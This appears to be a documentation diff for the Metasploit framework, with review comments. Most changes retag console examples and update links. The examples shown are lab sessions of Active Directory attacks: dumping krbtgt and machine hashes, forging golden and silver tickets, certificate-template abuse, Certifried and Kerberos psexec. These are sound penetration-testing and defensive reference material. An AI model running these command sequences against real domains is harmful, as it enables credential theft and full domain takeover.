msf6 auxiliary(admin/mssql/mssql_sql) > run 192.168.123.13 domaincontrollerrhost=192.168.123.13 username=administrator password=p4$$w0rd mssql::auth=kerberos mssql::rhostname=dc3.demo.local mssqldomain=demo.local sql='select auth_scheme from sys.dm_exec_connections where session_id=@@spid'
[*] Reloading module...
@@ -137,7 +147,7 @@ Optional options:
When a write-enabled `KrbCacheMode` is used, tickets that are issued to Metasploit will be stored for reuse. The `klist`
command can be used to view tickets. It is a top level command and can be run even if a module is in use.
```
```msf
msf6 > klist
Kerberos Cache
==============
@@ -154,7 +164,7 @@ host principal sname issue
More detailed information can be displayed by using the verbose (`-v` / `--verbose`) option.
```
```msf
msf6 > klist -v
Kerberos Cache
==============
@@ -196,15 +206,17 @@ The `klist` command can also be used for deleting tickets from the cache.
Metasploit stores tickets for future use in a user configurable way as controlled by the `KrbCacheMode` datastore
option. When a user attempts to use Kerberos to authenticate to a remote service such as SMB, if the cache mode is
read-enabled (e.g. set to `read-only` or `read-write`) and Metasploit is connected to a database, it will attempt to
fetch an existing ticket using the following steps.
fetch an existing ticket using the following steps targeting SMB for example purposes.
1. First Metasploit will use the datastore options, including the target host and username to search though the stored
tickets for an SMB-specific Ticket Granting Service (TGS). If one is found, it will be used. Tickets that are expired
will not be used.
2. If no TGS is found, Metasploit will repeat the search process looking for a Ticket Granting Ticket (TGT). If one is
1. If an external ticket is specified in the `${Prefix}::Krb5Ccname` option, that ticket will be used instead of the
cache.
2. When using the cache, Metasploit will first use the datastore options, including the target host and username to
search though the stored tickets for an SMB-specific Ticket Granting Service (TGS). If one is found, it will be used.
Tickets that are expired will not be used.
3. If no TGS is found, Metasploit will repeat the search process looking for a Ticket Granting Ticket (TGT). If one is
found, it will be used to contact the Key Distribution Center (KDC) and request a TGS for authentication to the SMB
service.
3. If no TGT is found, Metasploit will contact the KDC and authenticate using the username and password from the
4. If no TGT is found, Metasploit will contact the KDC and authenticate using the username and password from the
datastore to request a TGT then an SMB-specific TGS before authenticating to the SMB service.
If the cache mode is write-enabled (e.g. set to `write-only` or `read-write`) then any ticket, either TGT or TGS that is
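Review bot: the rewritten step 2 carries the typo `search though the stored tickets` forward from the old step 1 (`through`); fix it while the list is being renumbered. Otherwise the new ordering is right: an explicit `${Prefix}::Krb5Ccname` ticket is checked before the cache, then TGS, then TGT, then password, which matches the precedence described in the `Using external tickets` section added later in this patch.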
@@ -221,7 +233,7 @@ When a ticket (either TGT or TGS) is stored, it is saved along with the other lo
CCACHE files can be viewed with the `loot --type mit.kerberos.ccache` command (the `--type` argument filters for the
specified type).
```
```msf
msf6 auxiliary(admin/dcerpc/icpr_cert) > loot --type mit.kerberos.ccache
Loot
@@ -254,4 +266,18 @@ Simultaneous Users: 16777216
#
```
## Using external tickets with Metasploit
A ticket obtained outside of Metasploit can be used for authentication by setting the `${Prefix}::Krb5Ccname` option
which is prioritized over the cache. This file must be in the [MIT Credential Cache][1] (CCACHE) file formath. If the
ticket is in the Kirbi format, it must first be converted using the `auxiliary/admin/kerberos/ticket_converter` module.
When an explicit CCACHE file is specified to load a ticket from, Metasploit will first attempt to load a TGS ticket
from the file. If the service class of the `sname` component does not match the necessary value (e.g. the sname is for
`HOST/dc.msflab.local` instead of `CIFS/dc.msflab.local`), the value will be patched automatically. If no TGS is found,
Metasploit will attempt to load a TGT from the file and use it to contact the KDC and issue a TGS which will be stored
for future use when the cache is write-enabled.
It is important to set the `${Prefix}::Rhostname` and `${Prefix}Domain` options correctly because they are used to
select the appropriate ticket from the file.
[1]: http://web.mit.edu/KERBEROS/krb5-devel/doc/formats/ccache_file_format.html
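Review bot: typo at "(CCACHE) file formath": should be "file format". In the same section, "use it to contact the KDC and issue a TGS" describes the KDC's side of the exchange; Metasploit requests the TGS, so "request a TGS" matches the wording used in step 3 of the cache section above. The sname-patching paragraph would benefit from one sentence on why rewriting the service class is possible without re-encrypting the ticket (the sname is not inside the ticket's encrypted part, so no service key is needed), since a reader otherwise has to take the "patched automatically" claim on faith. Finally, `${Prefix}::Rhostname` next to `${Prefix}Domain` looks like a missing `::`; if it is intentional (matching `Smb::Rhostname` and `SMBDomain` as used in the psexec example elsewhere in this diff), a short parenthetical would stop readers reporting it as a typo.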
@@ -857,6 +857,10 @@ NAVIGATION_CONFIG = [
path: 'GSoC-2022-Project-Ideas.md',
title: without_prefix('GSoC')
},
{
path: 'GSoC-2023-Project-Ideas.md',
title: without_prefix('GSoC')
},
]
},
{
@@ -1,20 +1,18 @@
# Metasploit Developer Documentation
*(last updated December 1, 2014)
Metasploit is actively supported by a community of hundreds of
contributors and thousands of users world-wide. As a result, the
accompanying documentation moves quite quickly.
The best source of documentation on Metasploit development is
https://github.com/rapid7/metasploit-framework/wiki. There are many
https://docs.metasploit.com/. There are many
treasures there, such as:
* [Evading Antivirus](https://github.com/rapid7/metasploit-framework/wiki/Evading-Anti-Virus)
* [How Payloads Work](https://github.com/rapid7/metasploit-framework/wiki/How-payloads-work)
* [How to use Datastore Options](https://github.com/rapid7/metasploit-framework/wiki/How-to-use-datastore-options)
* [How to write browser exploits with BES](https://github.com/rapid7/metasploit-framework/wiki/How-to-write-a-browser-exploit-using-BrowserExploitServer)
* [How to write a bruteforcer](https://github.com/rapid7/metasploit-framework/wiki/How-to-use-Msf%3A%3AAuxiliary%3A%3AAuthBrute-to-write-a-bruteforcer)
* [Evading Antivirus](https://docs.metasploit.com/docs/using-metasploit/intermediate/evading-anti-virus.html)
* [How Payloads Work](https://docs.metasploit.com/docs/using-metasploit/basics/how-payloads-work.html)
* [How to use Datastore Options](https://docs.metasploit.com/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html)
* [How to write browser exploits with BES](https://docs.metasploit.com/docs/development/developing-modules/libraries/http/how-to-write-a-browser-exploit-using-browserexploitserver.html)
* [How to write a bruteforcer](https://docs.metasploit.com/docs/development/developing-modules/libraries/how-to-use-msf-auxiliary-authbrute-to-write-a-bruteforcer.html)
...and many, many more.
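Review bot: the "(last updated December 1, 2014)" line directly under the title is left untouched while every link beneath it is rewritten, so the date is now wrong; either bump it or drop it, since the git history already records when the file changed. As shown here the line also opens with a lone `*` that is never closed; if italics were intended, it needs a matching `*` at the end.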
@@ -123,7 +123,7 @@ user set in the `IMPERSONATE` option (default is `Administrator`).
## Scenarios
### Windows Server 2019 Domain Controller with ADCS installed
```
```msf
msf6 auxiliary(admin/dcerpc/cve_2022_26923_certifried) > run verbose=true rhosts=192.168.100.104 username=Test password=123456 domain=mylab.local dc_name=DC02 ca=mylab-DC02-CA
[*] Running module against 192.168.100.104
@@ -191,7 +191,7 @@ host service type name content
```
### Using `psexec` with the TGS impersonating the Administrator
```
```msf
msf6 exploit(windows/smb/psexec) > exploit rhosts=192.168.100.104 lhost=192.168.100.1 smbuser=administrator smbdomain=mylab.local Smb::Auth=kerberos Smb::Rhostname=dc02.mylab.local DomainControllerRhost=192.168.100.104
@@ -48,7 +48,7 @@ Request a certificate. The certificate PFX file will be stored on success. The c
For this module to work, it's necessary to know the name of a CA and certificate template. These values can be obtained
by a normal user via LDAP.
```
```msf
msf6 > use auxiliary/gather/ldap_query
msf6 auxiliary(gather/ldap_query) > set BIND_DN aliddle@msflab.local
BIND_DN => aliddle@msflab.local
@@ -82,7 +82,7 @@ msf6 auxiliary(gather/ldap_query) >
In this scenario, an authenticated user issues a certificate for themselves using the `User` template which is available
by default. The user must know the CA name, which in this case is `msflab-DC-CA`.
```
```msf
msf6 > use auxiliary/admin/dcerpc/icpr_cert
msf6 auxiliary(admin/dcerpc/icpr_cert) > set RHOSTS 192.168.159.10
RHOSTS => 192.168.159.10
@@ -122,7 +122,7 @@ The user must know:
See [Certified Pre-Owned](https://posts.specterops.io/certified-pre-owned-d95910965cd2) section on ESC1 for more
information.
```
```msf
msf6 > use auxiliary/admin/dcerpc/icpr_cert
msf6 auxiliary(admin/dcerpc/icpr_cert) > set RHOSTS 192.168.159.10
RHOSTS => 192.168.159.10
@@ -165,7 +165,7 @@ information.
#### Step 1
The first step is to issue a certificate using the vulnerable certificate template.
```
```msf
msf6 > use auxiliary/admin/dcerpc/icpr_cert
msf6 auxiliary(admin/dcerpc/icpr_cert) > set RHOSTS 192.168.159.10
RHOSTS => 192.168.159.10
@@ -195,7 +195,7 @@ The second step is to run the module a second time, using the certificate templa
the target user. The `CERT_TEMPLATE` option is updated to one allowing authentication such as the default `User`
template.
```
```msf
msf6 auxiliary(admin/dcerpc/icpr_cert) > set PFX /home/smcintyre/.msf4/loot/20221107153602_default_unknown_windows.ad.cs_269882.pfx
PFX => /home/smcintyre/.msf4/loot/20221107153602_default_unknown_windows.ad.cs_269882.pfx
msf6 auxiliary(admin/dcerpc/icpr_cert) > set ON_BEHALF_OF MSFLAB\\smcintyre
@@ -233,7 +233,7 @@ request another certificate on behalf of the target account.
#### Step 1
The first step is to issue a certificate using the vulnerable certificate template.
```
```msf
msf6 > use auxiliary/admin/dcerpc/icpr_cert
msf6 auxiliary(admin/dcerpc/icpr_cert) > set RHOSTS 192.168.159.10
RHOSTS => 192.168.159.10
@@ -265,7 +265,7 @@ The second step is to run the module a second time, using the certificate templa
the target user. The `CERT_TEMPLATE` option is updated to one allowing authentication such as the default `User`
template.
```
```msf
msf6 auxiliary(admin/dcerpc/icpr_cert) > set PFX /home/smcintyre/.msf4/loot/20221107154656_default_unknown_windows.ad.cs_831021.pfx
PFX => /home/smcintyre/.msf4/loot/20221107154656_default_unknown_windows.ad.cs_831021.pfx
msf6 auxiliary(admin/dcerpc/icpr_cert) > set ON_BEHALF_OF MSFLAB\\smcintyre
@@ -60,7 +60,7 @@ msf6 auxiliary(admin/dcerpc/samr_computer) > set SMBUser aliddle
SMBUser => aliddle
msf6 auxiliary(admin/dcerpc/samr_computer) > set SMBPass Password1
SMBPass => Password1
msf6 auxiliary(admin/dcerpc/samr_computer) > show options
msf6 auxiliary(admin/dcerpc/samr_computer) > show options
Module options (auxiliary/admin/dcerpc/samr_computer):
@@ -68,7 +68,7 @@ Module options (auxiliary/admin/dcerpc/samr_computer):
---- --------------- -------- -----------
COMPUTER_NAME no The computer name
COMPUTER_PASSWORD no The password for the new computer
RHOSTS 192.168.159.96 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RHOSTS 192.168.159.96 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 445 yes The target port (TCP)
SMBDomain . no The Windows domain to use for authentication
SMBPass Password1 no The password for the specified username
@@ -94,7 +94,7 @@ Credentials
host origin service public private realm private_type JtR Format
---- ------ ------- ------ ------- ----- ------------ ----------
192.168.159.96 192.168.159.96 445/tcp (smb) DESKTOP-2X8F54QG$ MCoDkNALd3SdGR1GoLhqniEkWa8Me9FY MSFLAB Password
192.168.159.96 192.168.159.96 445/tcp (smb) DESKTOP-2X8F54QG$ MCoDkNALd3SdGR1GoLhqniEkWa8Me9FY MSFLAB Password
msf6 auxiliary(admin/dcerpc/samr_computer) >
```
@@ -60,7 +60,7 @@ For golden ticket attacks, the following information is required:
One way of extracting the krbtgt account NTHASH is to run the `auxiliary/gather/windows_secrets_dump` module:
```
```msf
msf6 > use auxiliary/gather/windows_secrets_dump
msf6 auxiliary(gather/windows_secrets_dump) > run smb://adf3.local;Administrator:p4$$w0rd@dc3.adf3.local
[*] Running module against 192.168.123.13
@@ -99,7 +99,7 @@ ADF3\krbtgt:502:aad3b435b51404eeaad3b435b51404ee:767400b2c71afa35a5dca216f2389cd
With the above information a golden ticket can be forged:
```
```msf
msf6 auxiliary(admin/kerberos/forge_ticket) > run action=FORGE_GOLDEN domain=adf3.local domain_sid=S-1-5-21-1266190811-2419310613-1856291569 nthash=767400b2c71afa35a5dca216f2389cd9 user=Administrator
[+] MIT Credential Cache ticket saved on /Users/user/.msf4/loot/20220831223726_default_192.168.123.13_kerberos_ticket._550522.bin
@@ -146,7 +146,7 @@ Example Service Principal Names:
One way of extracting the computer account NTHASH is to run the `auxiliary/gather/windows_secrets_dump` module:
```
```msf
msf6 > use auxiliary/gather/windows_secrets_dump
msf6 auxiliary(gather/windows_secrets_dump) > run smb://adf3.local;Administrator:p4$$w0rd@dc3.adf3.local
[*] Running module against 192.168.123.13
@@ -185,7 +185,7 @@ ADF3\DC3$:1001:aad3b435b51404eeaad3b435b51404ee:fbd103200439e14d4c8adad675d5f244
With the above information a silver ticket for SMB can be forged for the target host:
```
```msf
msf6 auxiliary(admin/kerberos/forge_ticket) > run action=FORGE_SILVER domain=adf3.local domain_sid=S-1-5-21-1266190811-2419310613-1856291569 nthash=fbd103200439e14d4c8adad675d5f244 user=Administrator spn=cifs/dc3.adf3.local
[+] MIT Credential Cache ticket saved on /Users/user/.msf4/loot/20220831223726_default_192.168.123.13_kerberos_ticket._550522.bin
@@ -75,7 +75,7 @@ Default is `true`.
An example of viewing the Kerberos ticket cache, and requesting a TGT with NT hash:
```
```msf
msf6 auxiliary(admin/kerberos/get_ticket) > klist
Kerberos Cache
==============
@@ -114,7 +114,7 @@ host port proto name state info
TGT with encryption key
```
```msf
msf6 auxiliary(admin/kerberos/get_ticket) > run verbose=true rhosts=10.0.0.24 domain=mylab.local username=Administrator AES_KEY=<redacted> action=GET_TGT
[*] Running module against 10.0.0.24
@@ -126,7 +126,7 @@ msf6 auxiliary(admin/kerberos/get_ticket) > run verbose=true rhosts=10.0.0.24 do
TGT with password
```
```msf
msf6 auxiliary(admin/kerberos/get_ticket) > run verbose=true rhosts=10.0.0.24 domain=mylab.local username=Administrator password=<redacted> action=GET_TGT
[*] Running module against 10.0.0.24
@@ -138,7 +138,7 @@ msf6 auxiliary(admin/kerberos/get_ticket) > run verbose=true rhosts=10.0.0.24 do
TGT with certificate
```
```msf
msf6 auxiliary(admin/kerberos/get_ticket) > run verbose=true rhosts=10.0.0.24 cert_file=/home/msfuser/.msf4/loot/20230124155521_default_10.0.0.24_windows.ad.cs_384669.pfx action=GET_TGT
[*] Running module against 10.0.0.24
@@ -153,7 +153,7 @@ msf6 auxiliary(admin/kerberos/get_ticket) >
TGS with NT hash:
```
```msf
msf6 auxiliary(admin/kerberos/get_ticket) > run verbose=true rhosts=10.0.0.24 domain=mylab.local username=Administrator nthash=<redacted> action=GET_TGS spn=cifs/dc02.mylab.local
[*] Running module against 10.0.0.24
@@ -175,7 +175,7 @@ host service type name content i
TGS with encryption key:
```
```msf
msf6 auxiliary(admin/kerberos/get_ticket) > run verbose=true rhosts=10.0.0.24 domain=mylab.local username=Administrator AES_KEY=<redacted> action=GET_TGS spn=cifs/dc02.mylab.local
[*] Running module against 10.0.0.24
@@ -188,7 +188,7 @@ msf6 auxiliary(admin/kerberos/get_ticket) > run verbose=true rhosts=10.0.0.24 do
TGS with password:
```
```msf
msf6 auxiliary(admin/kerberos/get_ticket) > run verbose=true rhosts=10.0.0.24 domain=mylab.local username=Administrator password=<redacted> action=GET_TGS spn=cifs/dc02.mylab.local
[*] Running module against 10.0.0.24
@@ -201,7 +201,7 @@ msf6 auxiliary(admin/kerberos/get_ticket) > run verbose=true rhosts=10.0.0.24 do
TGS with cached TGT:
```
```msf
msf6 auxiliary(admin/kerberos/get_ticket) > loot
Loot
@@ -223,7 +223,7 @@ msf6 auxiliary(admin/kerberos/get_ticket) > run verbose=true rhosts=10.0.0.24 do
TGS without cached TGT:
```
```msf
msf6 auxiliary(admin/kerberos/get_ticket) > loot
Loot
@@ -262,7 +262,7 @@ host service type name content i
TGS impersonating the Administrator account:
```
```msf
msf6 auxiliary(admin/kerberos/get_ticket) > run verbose=true rhosts=10.0.0.24 domain=mylab.local username=serviceA password=123456 action=GET_TGS spn=cifs/dc02.mylab.local impersonate=Administrator
[*] Running module against 10.0.0.24
@@ -16,7 +16,7 @@ Kerberos tickets can be acquired from multiple sources. For instance:
- Forged using the `forge_ticket` module after compromising the krbtgt or a service account's encryption keys
- Extracted from memory using Meterpreter and mimikatz:
```
```msf
meterpreter > load kiwi
Loading extension kiwi...
.#####. mimikatz 2.2.0 20191125 (x64/windows)
@@ -100,7 +100,7 @@ No other options are used in this action.
**Without Key**
```
```msf
msf6 auxiliary(admin/kerberos/inspect_ticket) > run TICKET_PATH=/path/to/ticket
Primary Principal: Administrator@WINDOMAIN.LOCAL
Ccache version: 4
@@ -133,7 +133,7 @@ Creds: 1
**With Key**
```
```msf
msf6 auxiliary(admin/kerberos/inspect_ticket) > run AES_KEY=4b912be0366a6f37f4a7d571bee18b1173d93195ef76f8d1e3e81ef6172ab326 TICKET_PATH=/path/to/ticket
Primary Principal: Administrator@WINDOMAIN.LOCAL
Ccache version: 4
@@ -21,7 +21,7 @@ The following actions are supported:
### List
```
```msf
msf6 auxiliary(admin/kerberos/keytab) > run keytab_file=./example.keytab
Keytab entries
@@ -38,7 +38,7 @@ Keytab entries
Adding an entry using a known password hash/key which has been extracted from a Domain Controller - for instance by using the `auxiliary/gather/windows_secrets_dump` module:
```
```msf
msf6 auxiliary(admin/kerberos/keytab) > run action=ADD keytab_file=./example.keytab principal=krbtgt realm=DEMO.LOCAL enctype=AES256 key=e1c5500ffb883e713288d8037651821b9ecb0dfad89e01d1b920fe136879e33c
[*] modifying existing keytab
@@ -47,7 +47,7 @@ msf6 auxiliary(admin/kerberos/keytab) > run action=ADD keytab_file=./example.key
Adding entries using a specified password:
```
```msf
msf6 auxiliary(admin/kerberos/keytab) > run action=ADD keytab_file=./example.keytab principal=Administrator realm=DEMO.LOCAL enctype=ALL password=p4$$w0rd
[*] modifying existing keytab
@@ -59,7 +59,7 @@ msf6 auxiliary(admin/kerberos/keytab) > run action=ADD keytab_file=./example.key
Export Kerberos encryption keys stored in the Metasploit database to a keytab file. This functionality is useful in conjunction with secrets dump
```
```msf
# Secrets dump
msf6 > use auxiliary/gather/windows_secrets_dump
msf6 auxiliary(gather/windows_secrets_dump) > run smbuser=Administrator smbpass=p4$$w0rd rhosts=192.168.123.13
@@ -137,7 +137,6 @@ should be viewable in Wireshark.
For example the previous TGS-REQ authenticator blob is now decrypted in the Wireshark UI. Wireshark on Linux may not show
the decrypted packet information in the packet details pane, instead it appears as a separate tab in the packet bytes pane:
```
tgs-req
pvno: 5
